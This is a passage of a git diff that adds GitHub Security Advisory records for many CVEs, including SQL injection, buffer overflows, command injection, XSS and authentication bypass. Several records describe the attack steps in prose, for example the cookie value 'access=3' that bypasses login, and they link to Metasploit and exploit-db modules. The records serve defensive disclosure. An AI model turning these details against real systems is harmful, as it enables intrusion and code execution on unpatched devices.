the title, categoryTitle, and tmpTag parameters.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50270" + }, + { + "type": "WEB", + "url": "https://github.com/fesiong/anqicms/issues/80" + }, + { + "type": "WEB", + "url": "https://gist.github.com/Baotong-Wu/1988181a78a797204a75d399af284f7c" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-ff3c-wfr9-cj43/GHSA-ff3c-wfr9-cj43.json b/advisories/unreviewed/2025/07/GHSA-ff3c-wfr9-cj43/GHSA-ff3c-wfr9-cj43.json new file mode 100644 index 0000000000000..823e47382b210 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-ff3c-wfr9-cj43/GHSA-ff3c-wfr9-cj43.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-ff3c-wfr9-cj43", + "modified": "2025-07-31T15:35:49Z", + "published": "2025-07-31T15:35:49Z", + "aliases": [ + "CVE-2013-10033" + ], + "details": "An unauthenticated SQL injection vulnerability exists in Kimai version 0.9.2.x via the db_restore.php endpoint. The flaw allows attackers to inject arbitrary SQL queries into the dates[] POST parameter, enabling file write via INTO OUTFILE under specific environmental conditions. This can lead to remote code execution by writing a PHP payload to the web-accessible temporary directory. The vulnerability has been confirmed in versions including 0.9.2.beta, 0.9.2.1294.beta, and 0.9.2.1306-3.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10033" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/webapp/kimai_sqli.rb" + }, + { + "type": "WEB", + "url": "https://vulners.com/metasploit/MSF:EXPLOIT-UNIX-WEBAPP-KIMAI_SQLI-" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/25606" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/30010" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/kimai-sqli" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-g2h4-mw8p-v523/GHSA-g2h4-mw8p-v523.json b/advisories/unreviewed/2025/07/GHSA-g2h4-mw8p-v523/GHSA-g2h4-mw8p-v523.json new file mode 100644 index 0000000000000..f458b93539dcc --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-g2h4-mw8p-v523/GHSA-g2h4-mw8p-v523.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-g2h4-mw8p-v523", + "modified": "2025-07-31T15:35:49Z", + "published": "2025-07-31T15:35:49Z", + "aliases": [ + "CVE-2012-10021" + ], + "details": "A stack-based buffer overflow vulnerability exists in D-Link DIR-605L Wireless N300 Cloud Router firmware versions 1.12 and 1.13 via the getAuthCode() function. The flaw arises from unsafe usage of sprintf() when processing user-supplied CAPTCHA data via the FILECODE parameter in /goform/formLogin. A remote unauthenticated attacker can exploit this to execute arbitrary code with root privileges on the device.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2012-10021" + }, + { + "type": "WEB", + "url": "https://forums.dlink.com/index.php?topic=51923.0" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/dlink_dir605l_captcha_bof.rb" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20121012062554/http://www.devttys0.com/2012/10/exploiting-a-mips-stack-overflow" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/29127" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/dlink-dir605l-captcha-handling-stack-based-buffer-overflow" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-gcm8-8cp3-3x4h/GHSA-gcm8-8cp3-3x4h.json b/advisories/unreviewed/2025/07/GHSA-gcm8-8cp3-3x4h/GHSA-gcm8-8cp3-3x4h.json new file mode 100644 index 0000000000000..381977be36383 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-gcm8-8cp3-3x4h/GHSA-gcm8-8cp3-3x4h.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gcm8-8cp3-3x4h", + "modified": "2025-07-31T15:35:50Z", + "published": "2025-07-31T15:35:50Z", + "aliases": [ + "CVE-2025-51569" + ], + "details": "A cross-site scripting (XSS) vulnerability exists in the LB-Link BL-CPE300M 01.01.02P42U14_06 router's web interface. The /goform/goform_get_cmd_process endpoint fails to sanitize user input in the cmd parameter before reflecting it into a text/html response. This allows unauthenticated attackers to inject arbitrary JavaScript, which is executed in the context of the router's origin when the crafted URL is accessed. The issue requires user interaction to exploit.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-51569" + }, + { + "type": "WEB", + "url": "https://www.lb-link.com/CPE300M-AX300-4G-LTE-Router-pd502775568.html" + }, + { + "type": "WEB", + "url": "https://www.zyenra.com/blog/xss-in-lb-link-lb-cpe300m.html" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-gm48-jxxv-q9v4/GHSA-gm48-jxxv-q9v4.json b/advisories/unreviewed/2025/07/GHSA-gm48-jxxv-q9v4/GHSA-gm48-jxxv-q9v4.json new file mode 100644 index 0000000000000..cae5d78d5c6ae --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-gm48-jxxv-q9v4/GHSA-gm48-jxxv-q9v4.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gm48-jxxv-q9v4", + "modified": "2025-07-31T15:35:50Z", + "published": "2025-07-31T15:35:50Z", + "aliases": [ + "CVE-2014-125126" + ], + "details": "An unrestricted file upload vulnerability exists in Simple E-Document versions 3.0 to 3.1 that allows an unauthenticated attacker to bypass authentication by sending a specific cookie header (access=3) with HTTP requests. The application’s upload mechanism fails to restrict file types and does not validate or sanitize user-supplied input, allowing attackers to upload malicious .php scripts. Authentication can be bypassed entirely by supplying a specially crafted cookie (access=3), granting access to the upload functionality without valid credentials. If file uploads are enabled on the server, the attacker can upload a web shell and gain remote code execution with the privileges of the web server user, potentially leading to full system compromise.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2014-125126" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/unix/webapp/simple_e_document_upload_exec.rb" + }, + { + "type": "WEB", + "url": "https://sourceforge.net/projects/simplee-doc" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/31264" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/simple-edocument-abitrary-file-upload-rce" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-306" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-gww2-cgc8-8xg9/GHSA-gww2-cgc8-8xg9.json b/advisories/unreviewed/2025/07/GHSA-gww2-cgc8-8xg9/GHSA-gww2-cgc8-8xg9.json new file mode 100644 index 0000000000000..eec7eaa7fe07e --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-gww2-cgc8-8xg9/GHSA-gww2-cgc8-8xg9.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-gww2-cgc8-8xg9", + "modified": "2025-07-31T15:35:50Z", + "published": "2025-07-31T15:35:50Z", + "aliases": [ + "CVE-2013-10039" + ], + "details": "A command injection vulnerability exists in GestioIP 3.0 commit ac67be and earlier in ip_checkhost.cgi. Crafted input to the 'ip' parameter allows attackers to execute arbitrary shell commands on the server via embedded base64-encoded payloads. Authentication may be required depending on deployment configuration.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10039" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/gestioip_exec.rb" + }, + { + "type": "WEB", + "url": "https://sourceforge.net/p/gestioip/gestioip/ci/ac67be9fce5ee4c0438d27dfa5c1dcbca08c457c" + }, + { + "type": "WEB", + "url": "https://sourceforge.net/projects/gestioip" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/gestioip-rce" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-hc9q-xqxq-qjr5/GHSA-hc9q-xqxq-qjr5.json b/advisories/unreviewed/2025/07/GHSA-hc9q-xqxq-qjr5/GHSA-hc9q-xqxq-qjr5.json new file mode 100644 index 0000000000000..410f5893b6389 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-hc9q-xqxq-qjr5/GHSA-hc9q-xqxq-qjr5.json @@ -0,0 +1,37 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-hc9q-xqxq-qjr5", + "modified": "2025-07-31T15:35:50Z", + "published": "2025-07-31T15:35:50Z", + "aliases": [ + "CVE-2025-50475" + ], + "details": "An OS command injection vulnerability exists in Russound MBX-PRE-D67F firmware version 3.1.6, allowing unauthenticated attackers to execute arbitrary commands as root via crafted input to the hostname parameter in network configuration requests. This vulnerability stems from improper neutralization of special elements used in an OS command within the network configuration handler, enabling remote code execution with the highest privileges.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50475" + }, + { + "type": "WEB", + "url": "https://drive.google.com/file/d/1ZmZHzJKU-nrhFXd9w94aiGXYYYldtmni/view?usp=sharing" + }, + { + "type": "WEB", + "url": "https://pastebin.com/ic8hkC5V" + }, + { + "type": "WEB", + "url": "https://pastebin.com/raw/0U6F55G5" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-j98h-m6px-h428/GHSA-j98h-m6px-h428.json b/advisories/unreviewed/2025/07/GHSA-j98h-m6px-h428/GHSA-j98h-m6px-h428.json new file mode 100644 index 0000000000000..2f5d50c1bf0a7 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-j98h-m6px-h428/GHSA-j98h-m6px-h428.json @@ -0,0 +1,48 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-j98h-m6px-h428", + "modified": "2025-07-31T15:35:47Z", + "published": "2025-07-31T15:35:47Z", + "aliases": [ + "CVE-2025-8213" + ], + "details": "The NinjaScanner – Virus & Malware scan plugin for WordPress is vulnerable to arbitrary file deletion due to insufficient file path validation in the 'nscan_ajax_quarantine' and 'nscan_quarantine_select' functions in all versions up to, and including, 3.2.5. This makes it possible for authenticated attackers, with Administrator-level access and above, to delete arbitrary files on the server, including files outside the WordPress root directory.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8213" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ninjascanner/trunk/lib/ajax_hooks.php#L331" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/browser/ninjascanner/trunk/lib/tab_quarantine.php#L114" + }, + { + "type": "WEB", + "url": "https://plugins.trac.wordpress.org/changeset/3336569" + }, + { + "type": "WEB", + "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/6b1da345-ddbb-48ad-b0c1-bb0cb3b0fc69?source=cve" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-36" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T13:15:26Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-jgfv-5w6w-r347/GHSA-jgfv-5w6w-r347.json b/advisories/unreviewed/2025/07/GHSA-jgfv-5w6w-r347/GHSA-jgfv-5w6w-r347.json new file mode 100644 index 0000000000000..2a1c46a3f86c9 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-jgfv-5w6w-r347/GHSA-jgfv-5w6w-r347.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-jgfv-5w6w-r347", + "modified": "2025-07-31T15:35:50Z", + "published": "2025-07-31T15:35:50Z", + "aliases": [ + "CVE-2025-52289" + ], + "details": "A Broken Access Control vulnerability in MagnusBilling v7.8.5.3 allows newly registered users to gain escalated privileges by sending a crafted request to /mbilling/index.php/user/save to set their account status fom \"pending\" to \"active\" without requiring administrator approval.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-52289" + }, + { + "type": "WEB", + "url": "https://github.com/magnussolution/magnusbilling7/commit/f886330e9e9216a3830775610a4a83f970c08e8d" + }, + { + "type": "WEB", + "url": "https://github.com/Madhav-Bhardwaj/CVE-2025-52289" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:37Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-p82v-f8g6-gh2j/GHSA-p82v-f8g6-gh2j.json b/advisories/unreviewed/2025/07/GHSA-p82v-f8g6-gh2j/GHSA-p82v-f8g6-gh2j.json index 8599868da8e5b..6d67ef01352fb 100644 --- a/advisories/unreviewed/2025/07/GHSA-p82v-f8g6-gh2j/GHSA-p82v-f8g6-gh2j.json +++ b/advisories/unreviewed/2025/07/GHSA-p82v-f8g6-gh2j/GHSA-p82v-f8g6-gh2j.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-276" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2025/07/GHSA-pf4h-wcfc-95m7/GHSA-pf4h-wcfc-95m7.json b/advisories/unreviewed/2025/07/GHSA-pf4h-wcfc-95m7/GHSA-pf4h-wcfc-95m7.json new file mode 100644 index 0000000000000..932645f9c949b --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-pf4h-wcfc-95m7/GHSA-pf4h-wcfc-95m7.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pf4h-wcfc-95m7", + "modified": "2025-07-31T15:35:50Z", + "published": "2025-07-31T15:35:50Z", + "aliases": [ + "CVE-2013-10042" + ], + "details": "A stack-based buffer overflow vulnerability exists in freeFTPd version 1.0.10 and earlier in the handling of the FTP PASS command. When an attacker sends a specially crafted password string, the application fails to validate input length, resulting in memory corruption. This can lead to denial of service or arbitrary code execution. Exploitation requires the anonymous user account to be enabled.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10042" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/ftp/freeftpd_pass.rb" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/27747" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/freeftpd-pass-command-stack-based-buffer-overflow" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-121" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:34Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-pgqf-r37p-r3hr/GHSA-pgqf-r37p-r3hr.json b/advisories/unreviewed/2025/07/GHSA-pgqf-r37p-r3hr/GHSA-pgqf-r37p-r3hr.json new file mode 100644 index 0000000000000..f27ac99fe0b77 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-pgqf-r37p-r3hr/GHSA-pgqf-r37p-r3hr.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pgqf-r37p-r3hr", + "modified": "2025-07-31T15:35:48Z", + "published": "2025-07-31T15:35:48Z", + "aliases": [ + "CVE-2011-10008" + ], + "details": "A stack-based buffer overflow vulnerability exists in MPlayer Lite r33064 due to improper bounds checking when handling M3U playlist files containing long http:// URL entries. An attacker can craft a malicious .m3u file with a specially formatted URL that triggers a stack overflow when processed by the player, particularly via drag-and-drop interaction. This flaw allows for control of the execution flow through SEH overwrite and a DEP bypass using a ROP chain that leverages known gadgets in loaded DLLs. Successful exploitation may result in arbitrary code execution with the privileges of the current user.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:A/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2011-10008" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/windows/fileformat/mplayer_m3u_bof.rb" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/17013" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/mplayer-lite-r33064-m3u-stack-based-buffer-overflow" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-pp44-53wg-rwwx/GHSA-pp44-53wg-rwwx.json b/advisories/unreviewed/2025/07/GHSA-pp44-53wg-rwwx/GHSA-pp44-53wg-rwwx.json new file mode 100644 index 0000000000000..95485235f70c9 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-pp44-53wg-rwwx/GHSA-pp44-53wg-rwwx.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-pp44-53wg-rwwx", + "modified": "2025-07-31T15:35:50Z", + "published": "2025-07-31T15:35:50Z", + "aliases": [ + "CVE-2025-50849" + ], + "details": "CS Cart 4.18.3 is vulnerable to Insecure Direct Object Reference (IDOR). The user profile functionality allows enabling or disabling stickers through a parameter (company_id) sent in the request. However, this operation is not properly validated on the server side. An authenticated user can manipulate the request to target other users' accounts and toggle the sticker setting by modifying the company_id or other object identifiers.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-50849" + }, + { + "type": "WEB", + "url": "https://github.com/hackerwahab/CS-Cart-Vulns/blob/main/CVE-2025-50849.md" + }, + { + "type": "WEB", + "url": "http://cs.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:36Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-q65g-898q-8jpw/GHSA-q65g-898q-8jpw.json b/advisories/unreviewed/2025/07/GHSA-q65g-898q-8jpw/GHSA-q65g-898q-8jpw.json new file mode 100644 index 0000000000000..cfbd9a526545f --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-q65g-898q-8jpw/GHSA-q65g-898q-8jpw.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-q65g-898q-8jpw", + "modified": "2025-07-31T15:35:49Z", + "published": "2025-07-31T15:35:49Z", + "aliases": [ + "CVE-2013-10035" + ], + "details": "A code injection vulnerability exists in ProcessMaker Open Source versions 2.x when using the default 'neoclassic' skin. An authenticated user can execute arbitrary PHP code via multiple endpoints, including appFolderAjax.php, casesStartPage_Ajax.php, and cases_SchedulerGetPlugins.php, by supplying crafted POST requests to parameters such as action and params. These endpoints fail to validate user input and directly invoke PHP functions like system() with user-supplied parameters, enabling remote code execution. The vulnerability affects both Linux and Windows installations and is present in default configurations of versions including 2.0.23 through 2.5.1. The vulnerable skin cannot be removed through the web interface, and exploitation requires only valid user credentials.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10035" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/multi/http/processmaker_exec.rb" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20150419043936/https://bugs.processmaker.com/view.php?id=13436" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/29325" + }, + { + "type": "WEB", + "url": "https://www.fortiguard.com/encyclopedia/ips/37390" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/processmaker-open-source-neoclassic-skin-php-code-execution" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-94" + ], + "severity": "HIGH", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:33Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-qgmq-rhmw-xw3r/GHSA-qgmq-rhmw-xw3r.json b/advisories/unreviewed/2025/07/GHSA-qgmq-rhmw-xw3r/GHSA-qgmq-rhmw-xw3r.json new file mode 100644 index 0000000000000..b0091a587809f --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-qgmq-rhmw-xw3r/GHSA-qgmq-rhmw-xw3r.json @@ -0,0 +1,40 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-qgmq-rhmw-xw3r", + "modified": "2025-07-31T15:35:48Z", + "published": "2025-07-31T15:35:48Z", + "aliases": [ + "CVE-2025-7738" + ], + "details": "A flaw was found in Ansible Automation Platform (AAP) where the Gateway API returns the client secret for certain GitHub Enterprise authenticators in clear text. This vulnerability affects administrators or auditors accessing authenticator configurations. While access is limited to privileged users, the clear text exposure of sensitive credentials increases the risk of accidental leaks or misuse.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-7738" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2025-7738" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2381589" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-312" + ], + "severity": "MODERATE", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T14:15:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-r6rg-5pm3-f7mf/GHSA-r6rg-5pm3-f7mf.json b/advisories/unreviewed/2025/07/GHSA-r6rg-5pm3-f7mf/GHSA-r6rg-5pm3-f7mf.json index a4c348e466bc4..17b6f1074991f 100644 --- a/advisories/unreviewed/2025/07/GHSA-r6rg-5pm3-f7mf/GHSA-r6rg-5pm3-f7mf.json +++ b/advisories/unreviewed/2025/07/GHSA-r6rg-5pm3-f7mf/GHSA-r6rg-5pm3-f7mf.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-276" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2025/07/GHSA-v78w-vpxh-p52w/GHSA-v78w-vpxh-p52w.json b/advisories/unreviewed/2025/07/GHSA-v78w-vpxh-p52w/GHSA-v78w-vpxh-p52w.json new file mode 100644 index 0000000000000..6ff7267f4e2d9 --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-v78w-vpxh-p52w/GHSA-v78w-vpxh-p52w.json @@ -0,0 +1,33 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v78w-vpxh-p52w", + "modified": "2025-07-31T15:35:50Z", + "published": "2025-07-31T15:35:50Z", + "aliases": [ + "CVE-2024-34328" + ], + "details": "An open redirect in Sielox AnyWare v2.1.2 allows attackers to execute a man-in-the-middle attack via a crafted URL.", + "severity": [], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-34328" + }, + { + "type": "WEB", + "url": "https://github.com/0xsu3ks/CVE-2024-34328" + }, + { + "type": "WEB", + "url": "https://sielox.com" + } + ], + "database_specific": { + "cwe_ids": [], + "severity": null, + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-31T15:15:35Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-v9m4-r43p-9696/GHSA-v9m4-r43p-9696.json b/advisories/unreviewed/2025/07/GHSA-v9m4-r43p-9696/GHSA-v9m4-r43p-9696.json new file mode 100644 index 0000000000000..f39421f0d970f --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-v9m4-r43p-9696/GHSA-v9m4-r43p-9696.json @@ -0,0 +1,44 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-v9m4-r43p-9696", + "modified": "2025-07-31T15:35:50Z", + "published": "2025-07-31T15:35:50Z", + "aliases": [ + "CVE-2013-10043" + ], + "details": "A vulnerability exists in OAstium VoIP PBX astium-confweb-2.1-25399 and earlier, where improper input validation in the logon.php script allows an attacker to bypass authentication via SQL injection. Once authenticated as an administrator, the attacker can upload arbitrary PHP code through the importcompany field in import.php, resulting in remote code execution. The malicious payload is injected into /usr/local/astium/web/php/config.php and executed with root privileges by triggering a configuration reload via sudo /sbin/service astcfgd reload. Successful exploitation leads to full system compromise.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2013-10043" + }, + 